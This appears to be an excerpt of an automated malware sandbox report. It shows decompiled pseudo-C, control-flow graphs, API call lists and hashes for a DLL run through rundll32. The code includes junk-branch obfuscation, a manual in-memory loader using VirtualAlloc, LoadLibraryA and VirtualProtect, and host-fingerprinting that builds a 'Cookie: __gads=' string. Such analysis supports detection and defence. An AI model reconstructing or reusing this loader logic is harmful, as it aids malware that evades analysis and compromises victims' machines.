                                              				if (__edx == __edx) goto 0xf753608a;
                                              				_a328 = 6;
                                              				_a328 = _a328 + 0x27;
                                              				if (__ebx == __ebx) goto 0xf7536059;
                                              				_a332 = 0x35;
                                              				_a332 = _a332 + 0x17;
                                              				if (_t41 == _t41) goto 0xf753602b;
                                              				_a312 = 0x19cc;
                                              				_a312 = _a312 + 0xa0;
                                              				if (__ebx == __ebx) goto 0xf75360a5;
                                              				_a340 = 0xd9;
                                              				_a340 = _a340 + 0x81;
                                              				goto L1;
                                              				_a316 = 0x5c;
                                              				_a316 = _a316 + 0x8f;
                                              				if (__cx == __cx) goto 0xf75360d7;
                                              				_a308 = 7;
                                              				_a308 = _a308 + 0x12;
                                              				if (__ch == __ch) goto 0xf7536070;
                                              				_a320 = 0x24b;
                                              				_a320 = _a320 + 0x30;
                                              				if (__dl == __dl) goto L2;
                                              				__eax =  *((intOrPtr*)(__rsp + 0x70 + _a80 * 4));
                                              				if (__eax - 0x1f4 <= 0) goto 0xf75360f2;
                                              				_t38 = __r10;
                                              				__r10 = __rsp;
                                              				__rsp = _t38;
                                              				__r11 = __r11 << 0x40;
                                              				return __eax;
                                              			}
                                              0x7fef7535feb
                                              0x7fef7535fed
                                              0x7fef7535ff9
                                              0x7fef7536004
                                              0x7fef7536014
                                              0x7fef753601f
                                              0x7fef7536029
                                              0x7fef753602b
                                              0x7fef7536036
                                              0x7fef7536040
                                              0x7fef7536042
                                              0x7fef753604d
                                              0x7fef7536057
                                              0x7fef7536059
                                              0x7fef7536064
                                              0x7fef753606e
                                              0x7fef7536070
                                              0x7fef753607b
                                              0x7fef7536088
                                              0x7fef753608a
                                              0x7fef7536095
                                              0x7fef75360a0
                                              0x7fef75360a5
                                              0x7fef75360b0
                                              0x7fef75360be
                                              0x7fef75360c0
                                              0x7fef75360cb
                                              0x7fef75360d5
                                              0x7fef75360d7
                                              0x7fef75360e2
                                              0x7fef75360ec
                                              0x7fef75360f7
                                              0x7fef7536105
                                              0x7fef753610e
                                              0x7fef753610e
                                              0x7fef753610e
                                              0x7fef7536116
                                              0x7fef753611b

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944274000.000007FEF7531000.00000020.00000001.01000000.00000004.sdmp, Offset: 000007FEF7530000, based on PE: true
                                              • Associated: 00000005.00000002.944267845.000007FEF7530000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000005.00000002.944315478.000007FEF7589000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_7fef7530000_rundll32.jbxd
                                              Similarity
                                              • API ID: CreateSection
                                              • String ID:
                                              • API String ID: 2449625523-0
                                              • Opcode ID: 8b32971e4af457eda586907c53b90aeb09a8bd07261add21a48acce25afcaa35
                                              • Instruction ID: ca76910b85062f20d989a0bad71702730f028c68b2272f37a84166c3da266900
                                              • Opcode Fuzzy Hash: 8b32971e4af457eda586907c53b90aeb09a8bd07261add21a48acce25afcaa35
                                              • Instruction Fuzzy Hash: 6B119B72A1C6C5C6F7F09B54E0547AAA7E3F384394F501039FA8A46AB8D77DD5448B01
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 353 7fef7532cf7-7fef7532cff 354 7fef7532d01-7fef7532d0d CryptAcquireContextW 353->354 355 7fef7532cda-7fef7532cf2 CryptCreateHash 353->355 357 7fef7532faa-7fef7532fc4 354->357 358 7fef7532fb9-7fef7532fbb 354->358 359 7fef753313c-7fef753313e 355->359 358->357 360 7fef7532fbd-7fef7532fbf 358->360 362 7fef7533134 359->362 363 7fef7533140-7fef7533142 359->363 360->359 361 7fef7533283 360->361 366 7fef7533352-7fef7533368 361->366 362->359 363->361 367 7fef753336a-7fef7533380 366->367 368 7fef7533307-7fef753331c 366->368 369 7fef75332ab-7fef75332c1 367->369 370 7fef7533386-7fef753338e 367->370 371 7fef7533322-7fef7533338 368->371 372 7fef753328f-7fef75332a5 368->372 373 7fef75332c3-7fef75332cb 369->373 374 7fef753333a-7fef7533350 369->374 376 7fef753339e-7fef75333b4 370->376 371->374 375 7fef75332f0-7fef7533305 371->375 372->367 372->369 377 7fef75332db-7fef75332ee 373->377 374->366 374->371 375->368 375->377 378 7fef75333d0-7fef75333e6 376->378 379 7fef75333b6-7fef75333ce 376->379 377->373 381 7fef7533450-7fef7533465 378->381 382 7fef75333e8-7fef75333fd 378->382 379->378 380 7fef75333ff-7fef7533417 379->380 380->382 384 7fef7533419-7fef753342f 380->384 381->379 383 7fef753346b-7fef7533483 381->383 382->380 382->383 383->384 386 7fef7533485-7fef75335d5 383->386 384->370 385 7fef7533434-7fef753344a 384->385 385->376 385->381 391 7fef7533631-7fef7533647 386->391 392 7fef75335d7-7fef75335ed 386->392 391->392 393 7fef7533649-7fef753364b 391->393 394 7fef75335ef-7fef75335f5 392->394 395 7fef75335f7-7fef75335ff 392->395 394->393 394->395 396 7fef7533607 395->396 396->396
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944274000.000007FEF7531000.00000020.00000001.01000000.00000004.sdmp, Offset: 000007FEF7530000, based on PE: true
                                              • Associated: 00000005.00000002.944267845.000007FEF7530000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000005.00000002.944315478.000007FEF7589000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_7fef7530000_rundll32.jbxd
                                              Similarity
                                              • API ID: Crypt$AcquireContextCreateHash
                                              • String ID:
                                              • API String ID: 1914063823-0
                                              • Opcode ID: 9328c7aaf945543188686a8cb83c328452d0d61bf2d104c301b4851cb1c44e76
                                              • Instruction ID: a67fd344e1d05935e3801df255800a01c5641867fe5a24e33360d5b55ffda2a7
                                              • Opcode Fuzzy Hash: 9328c7aaf945543188686a8cb83c328452d0d61bf2d104c301b4851cb1c44e76
                                              • Instruction Fuzzy Hash: 2AF01222F2C94792F7F08751E41177E52E3E795340F544431BE8F829F8EA3DE9569A00
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 437 7fef7532cca-7fef7532f9d CryptCreateHash 439 7fef7532f9f-7fef75330f4 437->439 440 7fef7532f68-7fef7533283 437->440 443 7fef7533116-7fef7533128 439->443 444 7fef75330f6 439->444 461 7fef7533352-7fef7533368 440->461 446 7fef7533698-7fef75336a2 443->446 444->444 447 7fef75336a4-7fef75336ae 446->447 448 7fef75336b0-7fef75336bf call 7fef7537947 446->448 447->448 450 7fef75336c1-7fef75336ce 447->450 448->447 448->450 453 7fef753367f-7fef7533696 450->453 454 7fef75336d0-7fef75336d5 450->454 453->446 458 7fef7533671-7fef753367d 453->458 459 7fef75336dd-7fef75336e5 454->459 458->453 458->459 459->454 462 7fef753336a-7fef7533380 461->462 463 7fef7533307-7fef753331c 461->463 464 7fef75332ab-7fef75332c1 462->464 465 7fef7533386-7fef753338e 462->465 466 7fef7533322-7fef7533338 463->466 467 7fef753328f-7fef75332a5 463->467 468 7fef75332c3-7fef75332cb 464->468 469 7fef753333a-7fef7533350 464->469 471 7fef753339e-7fef75333b4 465->471 466->469 470 7fef75332f0-7fef7533305 466->470 467->462 467->464 472 7fef75332db-7fef75332ee 468->472 469->461 469->466 470->463 470->472 473 7fef75333d0-7fef75333e6 471->473 474 7fef75333b6-7fef75333ce 471->474 472->468 476 7fef7533450-7fef7533465 473->476 477 7fef75333e8-7fef75333fd 473->477 474->473 475 7fef75333ff-7fef7533417 474->475 475->477 479 7fef7533419-7fef753342f 475->479 476->474 478 7fef753346b-7fef7533483 476->478 477->475 477->478 478->479 481 7fef7533485-7fef75335d5 478->481 479->465 480 7fef7533434-7fef753344a 479->480 480->471 480->476 486 7fef7533631-7fef7533647 481->486 487 7fef75335d7-7fef75335ed 481->487 486->487 488 7fef7533649-7fef753364b 486->488 489 7fef75335ef-7fef75335f5 487->489 490 7fef75335f7-7fef75335ff 487->490 489->488 489->490 491 7fef7533607 490->491 491->491
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944274000.000007FEF7531000.00000020.00000001.01000000.00000004.sdmp, Offset: 000007FEF7530000, based on PE: true
                                              • Associated: 00000005.00000002.944267845.000007FEF7530000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000005.00000002.944315478.000007FEF7589000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_7fef7530000_rundll32.jbxd
                                              Similarity
                                              • API ID: CreateCryptHash
                                              • String ID:
                                              • API String ID: 4184778727-0
                                              • Opcode ID: 1b2df4a2d971ec85693729c80128cdf9c680fc0664a4aaac409bd98b765b1bdf
                                              • Instruction ID: 9dece2cc3ce22c78f6b74a853dc3b873818608cb0a77919127c1c58cb6f9399c
                                              • Opcode Fuzzy Hash: 1b2df4a2d971ec85693729c80128cdf9c680fc0664a4aaac409bd98b765b1bdf
                                              • Instruction Fuzzy Hash: 4A218362F3C5828AF7F09A54D44537A52E2E790300F944039FE8F8B7B4EA3EE8458B01
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944274000.000007FEF7531000.00000020.00000001.01000000.00000004.sdmp, Offset: 000007FEF7530000, based on PE: true
                                              • Associated: 00000005.00000002.944267845.000007FEF7530000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000005.00000002.944315478.000007FEF7589000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_7fef7530000_rundll32.jbxd
                                              Similarity
                                              • API ID: CreateCryptHash
                                              • String ID:
                                              • API String ID: 4184778727-0
                                              • Opcode ID: 6c0d0b01144992e9ee5506c314bfe315ee5ded7aa6eeff1a2f840e8b65ebe874
                                              • Instruction ID: c46d6e76456a39ad5920a08452d4907459b898345f2ebbc12925c1e1c41d3ae5
                                              • Opcode Fuzzy Hash: 6c0d0b01144992e9ee5506c314bfe315ee5ded7aa6eeff1a2f840e8b65ebe874
                                              • Instruction Fuzzy Hash: 8BD0C912F2DA4B82F7F44652A91073A46D3BBE1345F249031BD4E469F8DD3CF8529640
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              C-Code - Quality: 40%
                                              			E00000001180002860(void* __ecx, void* __edx, void* __edi, long long* __rax, long long __rbx, long long __rsi, long long __rbp, void* __r8, void* __r9, long long _a8, long long _a16, long long _a24) {
                                              				void* __rdi;
                                              				int _t23;
                                              				int _t24;
                                              				void* _t30;
                                              				long long* _t41;
                                              				void* _t46;
                                              				signed long long _t47;
                                              				signed long long _t48;
                                              				long long* _t69;
                                              				void* _t71;
                                              
                                              				_t41 = __rax;
                                              				_a8 = __rbx;
                                              				_a16 = __rbp;
                                              				_a24 = __rsi;
                                              				_t71 = __r8;
                                              				GetProcessHeap();
                                              				r8d = 0x2001;
                                              				RtlAllocateHeap(??, ??, ??); // executed
                                              				_t69 = __rax;
                                              				if (__rax == 0) goto 0x80002959;
                                              				r9d = __ecx;
                                              				_t23 = wsprintfW(??, ??);
                                              				r9d = __edx;
                                              				_t24 = wsprintfW(??, ??);
                                              				r9d = E00000001180001484(_t24, __rax, L"%s%u");
                                              				_t46 = _t23 + _t24 + wsprintfW(??, ??);
                                              				r9d = E0000000118000108C(__rax, _t46, __r8);
                                              				_t47 = _t46 + wsprintfW(??, ??);
                                              				E00000001180001904(__rax, _t47, __rax + _t47 * 2, _t71);
                                              				_t48 = _t47 + __rax;
                                              				_t30 = E000000011800027B4(__rax, _t48, __rax + _t48 * 2);
                                              				_t49 = _t48 + __rax;
                                              				E00000001180002018(_t30, _t48 + __rax, __rax + (_t48 + __rax) * 2, _t71, __rax, _t71);
                                              				return E0000000118000133C(_t49 + _t41, _t69 + (_t49 + _t41) * 2, _t71, ":");
                                              			}
                                              0x180002860
                                              0x180002860
                                              0x180002865
                                              0x18000286a
                                              0x180002874
                                              0x18000287b
                                              0x180002886
                                              0x18000288f
                                              0x180002895
                                              0x18000289b
                                              0x1800028a1
                                              0x1800028b5
                                              0x1800028be
                                              0x1800028d6
                                              0x1800028eb
                                              0x180002901
                                              0x18000290d
                                              0x180002923
                                              0x18000292a
                                              0x18000292f
                                              0x180002936
                                              0x18000293b
                                              0x180002945
                                              0x18000296d

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                              • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: wsprintf$Heap$Process$AddressLibraryLoadProc$AdaptersAllocInfoName$AllocateComputerCount64FreeInformationQuerySystemTickUser
                                              • String ID: %s%u$Cookie: __gads=
                                              • API String ID: 392523097-3007860590
                                              • Opcode ID: 331763b53d6f8557935e9ebf42fdd2c7f373a1b19adadbe0eaccf4172c03b777
                                              • Instruction ID: 8f6dff4a45bc758f9ad86f1329c8408aa2d07b8871dc2bc0e96f96c00fe38273
                                              • Opcode Fuzzy Hash: 331763b53d6f8557935e9ebf42fdd2c7f373a1b19adadbe0eaccf4172c03b777
                                              • Instruction Fuzzy Hash: 2C214872740A0996EB92DB55F8543E87360BB5CBC1F848129AB4D57772EE3CC62DC340
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 143 180001bd4-180001c0c LoadLibraryA GetProcAddress 145 180001c15-180001c25 143->145 146 180001c0e-180001c13 GetNativeSystemInfo 143->146 146->145
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                              • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressInfoLibraryLoadNativeProcSystem
                                              • String ID: GetNativeSystemInfo$KERNEL32.DLL
                                              • API String ID: 2103483237-4162215167
                                              • Opcode ID: 422b05c43dcb4eb9de9b7d23b9406151622cf17c3d48ce90b7700ffe9165f4bc
                                              • Instruction ID: 8e61e42ac17d5e92d5409a7507b4c0ea04a19fa1e2651f3f55c474f49308d06d
                                              • Opcode Fuzzy Hash: 422b05c43dcb4eb9de9b7d23b9406151622cf17c3d48ce90b7700ffe9165f4bc
                                              • Instruction Fuzzy Hash: 0BE06D72B24509D2EB93EB20E8543D93360FB9C780F848221A54E026A4EF2CD78DC740
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 192 2a0000-2a008f call 2a0618 * 6 205 2a05fa 192->205 206 2a0095-2a0098 192->206 207 2a05fc-2a0616 205->207 206->205 208 2a009e-2a00a1 206->208 208->205 209 2a00a7-2a00aa 208->209 209->205 210 2a00b0-2a00b3 209->210 210->205 211 2a00b9-2a00bc 210->211 211->205 212 2a00c2-2a00d0 211->212 212->205 213 2a00d6-2a00df 212->213 213->205 214 2a00e5-2a00ed 213->214 214->205 215 2a00f3-2a0101 214->215 216 2a0103-2a0108 215->216 217 2a0127-2a0159 GetNativeSystemInfo 215->217 218 2a010b-2a0125 216->218 217->205 219 2a015f-2a017b VirtualAlloc 217->219 218->217 218->218 220 2a017d-2a0190 219->220 221 2a0192-2a019d 219->221 220->221 222 2a019f-2a01ae 221->222 223 2a01b0-2a01cc 221->223 222->222 222->223 225 2a020a-2a0217 223->225 226 2a01ce-2a01cf 223->226 227 2a021d-2a0224 225->227 228 2a02d2-2a02d9 225->228 229 2a01d1-2a01d7 226->229 227->228 230 2a022a-2a0237 227->230 231 2a02db-2a02eb 228->231 232 2a0345-2a034c 228->232 233 2a01f9-2a0208 229->233 234 2a01d9-2a01f7 229->234 230->228 235 2a023d-2a0244 230->235 231->232 236 2a02ed-2a02ee 231->236 237 2a034e-2a0361 232->237 238 2a03c0-2a03d1 232->238 233->225 233->229 234->233 234->234 240 2a0247-2a024b 235->240 241 2a02f1-2a030a LoadLibraryA 236->241 237->238 239 2a0363-2a0364 237->239 242 2a04e1-2a04fa 238->242 243 2a03d7-2a03e0 238->243 244 2a0367-2a0380 239->244 245 2a02ba-2a02c4 240->245 246 2a032c-2a0332 241->246 262 2a04fc-2a0504 242->262 263 2a0521-2a0525 242->263 247 2a03e5-2a03e7 243->247 266 2a03a8-2a03ab 244->266 248 2a024d-2a0261 245->248 249 2a02c6-2a02cc 245->249 253 2a030c 246->253 254 2a0334-2a033f 246->254 250 2a04cc-2a04db 247->250 251 2a03ed-2a03f8 247->251 258 2a0263-2a0283 248->258 259 2a0285-2a0289 248->259 249->228 249->240 250->242 250->247 255 2a03fa-2a03fd 251->255 256 2a0411-2a0413 251->256 260 2a030e-2a0311 253->260 261 2a0313-2a0318 253->261 254->241 264 2a0341-2a0342 254->264 255->256 265 2a03ff-2a0401 255->265 267 2a044e-2a0451 
256->267 268 2a0415-2a0418 256->268 269 2a02b7-2a02b8 258->269 271 2a028b-2a028d 259->271 272 2a028f-2a0293 259->272 270 2a031a-2a0329 260->270 261->270 273 2a0508-2a050e 262->273 274 2a0527-2a0540 263->274 275 2a0544-2a054b 263->275 264->232 265->256 280 2a0403-2a040c 265->280 287 2a03ad-2a03ba 266->287 288 2a0382-2a0389 266->288 278 2a045f-2a0461 267->278 279 2a0453-2a0455 267->279 281 2a041a-2a041c 268->281 282 2a0424-2a0426 268->282 269->245 270->246 283 2a02aa-2a02b4 271->283 284 2a02a1-2a02a5 272->284 285 2a0295-2a029f 272->285 273->263 286 2a0510-2a051f 273->286 274->275 276 2a0551-2a0569 275->276 277 2a05f5-2a05f8 275->277 293 2a057b-2a058b 276->293 294 2a056b-2a0579 276->294 277->207 296 2a0463-2a0466 278->296 297 2a04a7-2a04a8 278->297 279->278 295 2a0457-2a045d 279->295 289 2a04ab-2a04b2 280->289 281->282 290 2a041e-2a0422 281->290 282->267 291 2a0428-2a042b 282->291 283->269 284->269 300 2a02a7 284->300 285->283 286->273 287->244 301 2a03bc-2a03bd 287->301 298 2a038b-2a038e 288->298 299 2a0390-2a0395 288->299 302 2a04bd-2a04ca VirtualProtect 289->302 303 2a04b4-2a04ba 289->303 304 2a0487-2a048b 290->304 305 2a042d-2a042f 291->305 306 2a0437-2a0439 291->306 293->277 308 2a058d-2a058e 293->308 294->293 294->294 295->304 309 2a0468-2a046a 296->309 310 2a0474-2a0476 296->310 297->289 311 2a0397-2a03a5 298->311 299->311 300->283 301->238 302->250 303->302 304->289 305->306 312 2a0431-2a0435 305->312 306->267 313 2a043b-2a043e 306->313 314 2a0590-2a0594 308->314 309->310 315 2a046c-2a0472 309->315 310->297 316 2a0478-2a047b 310->316 311->266 312->304 317 2a044a-2a044c 313->317 318 2a0440-2a0442 313->318 319 2a0596-2a05a0 314->319 320 2a05b5-2a05b8 314->320 315->304 322 2a048d-2a048f 316->322 323 2a047d-2a047f 316->323 317->267 317->297 318->317 324 2a0444-2a0448 318->324 325 2a05a3-2a05b3 319->325 326 2a05ba-2a05bd 320->326 327 2a05bf-2a05c3 320->327 322->297 329 2a0491-2a0494 322->329 323->322 328 2a0481-2a0482 323->328 324->304 325->320 325->325 326->327 
330 2a05d3-2a05e2 326->330 331 2a05e5-2a05f3 327->331 332 2a05c5-2a05cf 327->332 328->304 329->297 333 2a0496-2a04a5 329->333 330->331 331->277 332->277 334 2a05d1 332->334 333->304 334->314
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.943981609.00000000002A0000.00000040.10000000.00040000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_2a0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Virtual$AllocInfoLibraryLoadNativeProtectSystem
                                              • String ID:
                                              • API String ID: 395219687-0
                                              • Opcode ID: dd72a9d3825b757cb599c52874617b57d3dfc330cdb9a130d1801265dc8a93a8
                                              • Instruction ID: 46209ff592ff3be5724ea051c5ae86dc04102a47c50df4eb4c50fe123b7af696
                                              • Opcode Fuzzy Hash: dd72a9d3825b757cb599c52874617b57d3dfc330cdb9a130d1801265dc8a93a8
                                              • Instruction Fuzzy Hash: E8121930A38F0A8FDB289E58D8D5675B3D1FB5A311B68456DD98BC3202EE34EC538685
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 397 180001318-18000131c 398 180001329-180001330 397->398 399 180001332-180001334 ExitProcess 398->399 400 18000131e-180001323 SleepEx 398->400 400->398
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                              • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcessSleep
                                              • String ID:
                                              • API String ID: 911557368-0
                                              • Opcode ID: 87f2df61503c43403be47c73b52c885253801360124acf11aa6c9924d5a50bed
                                              • Instruction ID: 6bf3646277ed7659d23c391addaeef7dd43479a1e5d5f4f4aeea11294e6aed9e
                                              • Opcode Fuzzy Hash: 87f2df61503c43403be47c73b52c885253801360124acf11aa6c9924d5a50bed
                                              • Instruction Fuzzy Hash: C3D01231200248C7F2DBA721E8183EC3164A308382F90C129A106444E08F380B8C8304
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 401 7fef75336fa-7fef7533706 402 7fef7533721-7fef753372d 401->402 403 7fef7533708-7fef7533712 call 7fef7537947 401->403 405 7fef753372f-7fef753373b call 7fef7537947 402->405 406 7fef75336ec-7fef75336f5 402->406 411 7fef7533845-7fef7533852 403->411 413 7fef753373d-7fef753374b 405->413 414 7fef7533717-7fef753371f 405->414 407 7fef75339b9-7fef75339be 406->407 410 7fef75339d0-7fef75339f8 407->410 415 7fef7533854-7fef7533a3b 411->415 416 7fef75337ff-7fef753380c call 7fef753a588 411->416 418 7fef753375b-7fef7533765 413->418 419 7fef753374d-7fef7533759 413->419 414->403 424 7fef7533a4f-7fef7533a58 415->424 425 7fef7533a3d-7fef7533a43 415->425 428 7fef753380e-7fef7533818 416->428 429 7fef753381a-7fef7533826 416->429 418->405 423 7fef7533767-7fef75339aa call 7fef7538d0b 418->423 419->418 419->423 423->407 435 7fef75339ac-7fef75339b2 423->435 424->410 425->424 428->429 432 7fef7533828-7fef7533843 RtlAllocateHeap 428->432 429->428 429->432 432->411 432->415 435->407 436 7fef75339b4 435->436 436->401
                                              C-Code - Quality: 72%
                                              			E000007FE7FEF75336FA(void* __ebx, void* __edx, void* __edi, void* __esi, void* __esp, intOrPtr* _a8, intOrPtr* _a16, signed int _a33, char _a36, char _a37, long long _a40, long long _a48, long long _a56, signed int _a64, long long _a72, long long _a80, long long _a88, long long _a96, void* _a136) {
                                              				unsigned int _v48;
                                              				intOrPtr _v64;
                                              				intOrPtr* _v72;
                                              				unsigned int _v80;
                                              				char _v87;
                                              				char _v88;
                                              				long long _v104;
                                              				signed long long _v112;
                                              				intOrPtr _t63;
                                              				intOrPtr _t64;
                                              				intOrPtr _t65;
                                              				signed int _t70;
                                              				signed int _t71;
                                              				intOrPtr _t76;
                                              				signed int _t77;
                                              				signed int _t78;
                                              				void* _t82;
                                              				signed int _t87;
                                              				void* _t92;
                                              				void* _t101;
                                              				long long _t128;
                                              				long long _t129;
                                              				long long _t130;
                                              				long long _t132;
                                              				long long _t133;
                                              				void* _t140;
                                              				void* _t141;
                                              				intOrPtr* _t154;
                                              				long long _t155;
                                              				void* _t156;
                                              				void* _t157;
                                              				void* _t158;
                                              				void* _t159;
                                              				void* _t160;
                                              				void* _t161;
                                              				void* _t162;
                                              				void* _t163;
                                              				void* _t164;
                                              				void* _t165;
                                              				void* _t166;
                                              				void* _t167;
                                              				void* _t168;
                                              
                                              				_t92 = __edx;
                                              				_t128 = _a56 + 2;
                                              				if (__esp == __esp) goto 0xf7533721;
                                              				_t64 = E000007FE7FEF7537947(_t63, __ebx, _t82, __edx, __edi, __esi, _t128, _t140, _t141, _t157, _t160, _t162, _t164, _t166, _t168);
                                              				_a96 = _t128;
                                              				goto 0xf7533845;
                                              				goto 0xf7533708;
                                              				_a56 = _t128;
                                              				_t129 = _a40;
                                              				if (_t64 == _t64) goto 0xf75336ec;
                                              				_t65 = E000007FE7FEF7537947(_t64, __ebx, 0xd45a1e1f, _t92, __edi, __esi, _t129, _t140, _t141, _t157, _t160, _t162, _t164, _t166, _t168);
                                              				_a88 = _t129;
                                              				if (_t92 == _t92) goto 0xf7533717;
                                              				 *((intOrPtr*)(_a136 + 8)) = _t65;
                                              				if (__esi == __esi) goto 0xf753375b;
                                              				r8d = r8d + 2;
                                              				if (0xd45a1e1f == 0xd45a1e1f) goto 0xf7533767;
                                              				if (0x67cc0818 == 0x67cc0818) goto 0xf753372f;
                                              				_t143 = _a56;
                                              				E000007FE7FEF7538D0B(_t65, 0x67cc0818, __esi, _t101, __esp, _t129, _a56,  &_a36, _t156, _t157, _t158, _t160, _t162, _t163, _t164, _t165, _t166, _t167);
                                              				_a96();
                                              				_t87 = _a33;
                                              				E000007FE7FEF7533D78(_t87, __esp, _t129, _t140, _t143,  &_a36, _t157, _t158, _t162, _t166, _t167);
                                              				if (_t87 == _t87) goto 0xf75337c0;
                                              				_t70 = _t87;
                                              				if (_t92 == _t92) goto 0xf753379e;
                                              				_t154 = _a136;
                                              				if (__ebx == __ebx) goto 0xf7533776;
                                              				_t71 = _t70 << 4;
                                              				_a64 = _t71;
                                              				if (_t71 == _t71) goto 0xf7533786;
                                              				if ((_a64 | _t71) == (_a64 | _t71)) goto 0xf7533793;
                                              				_t155 =  *_t154;
                                              				 *(_t155 +  *((intOrPtr*)(_t129 + 0x30))) = _t71;
                                              				goto 0xf75337d7;
                                              				goto 0xf75339c6;
                                              				if (_a48 - _t129 >= 0) goto 0xf75337d7;
                                              				_t130 = _a48;
                                              				goto 0xf75337f2;
                                              				goto 0xf753395d;
                                              				_a80 = _t130;
                                              				E000007FE7FEF753A588(1, _t140, _t155, _t156, _t162, _t163, _t164, _t166, _t168);
                                              				if (__edi == __edi) goto 0xf753381a;
                                              				_t161 = _a56 + _t130;
                                              				if (__ebx == __ebx) goto 0xf7533828;
                                              				if (__esp == __esp) goto 0xf753380e;
                                              				if (__esp == __esp) goto 0xf7533834; // executed
                                              				RtlAllocateHeap(??, ??, ??);
                                              				if (__edi == __edi) goto 0xf7533854;
                                              				_t132 = _a136;
                                              				_t76 =  *((intOrPtr*)(_t132 + 8));
                                              				if (__ebx == __ebx) goto 0xf75337ff;
                                              				 *_a136 = _t132;
                                              				_t133 = _a136;
                                              				r8d = r8d + 0xf;
                                              				if (0 == 0) goto 0xf753386e;
                                              				_t152 = _a136;
                                              				_t77 = E000007FE7FEF7538E8D(_t76, _t140, _t152, _t155, _t156, _t157, _t158, _t161, _t162, _t164, _t165, _t166, _t167, _t168);
                                              				if (0 == 0) goto 0xf75338b6;
                                              				_a36 = _a36 + 0x24;
                                              				_a37 = 5;
                                              				goto 0xf7533898;
                                              				_a37 = _a37 + 0x73;
                                              				r8d = 0;
                                              				goto 0xf753374d;
                                              				_a56 = _t133;
                                              				_a36 = 0xc;
                                              				if (_t77 == _t77) goto 0xf753388c;
                                              				_t78 = _t77 / _t152;
                                              				if (_t78 == _t78) goto 0xf7533880;
                                              				_a72 = _a40;
                                              				goto 0xf753391b;
                                              				_t159 = _t159 - 0x78;
                                              				goto 0xf7533b2c;
                                              				_v104 = _t155;
                                              				_v112 = _t152;
                                              				if (__esi == __esi) goto 0xf75338d3;
                                              				_t152 =  *_a8;
                                              				E000007FE7FEF75390C0( *((intOrPtr*)(_a40 + 8)), _a8, _t140,  *_a8, _t155, _t156, _t157, _t162, _t163, _t164, _t165, _t167, _t168);
                                              				goto 0xf7533b3f;
                                              				goto 0xf75338a8;
                                              				if ( *_a8 == 0) goto 0xf7533900;
                                              				_t78 = 0;
                                              				goto 0xf7533900;
                                              				_v80 = _v48;
                                              				goto L8;
                                              				_v87 = __al;
                                              				goto 0xf7533b1e;
                                              				__rcx = _a16;
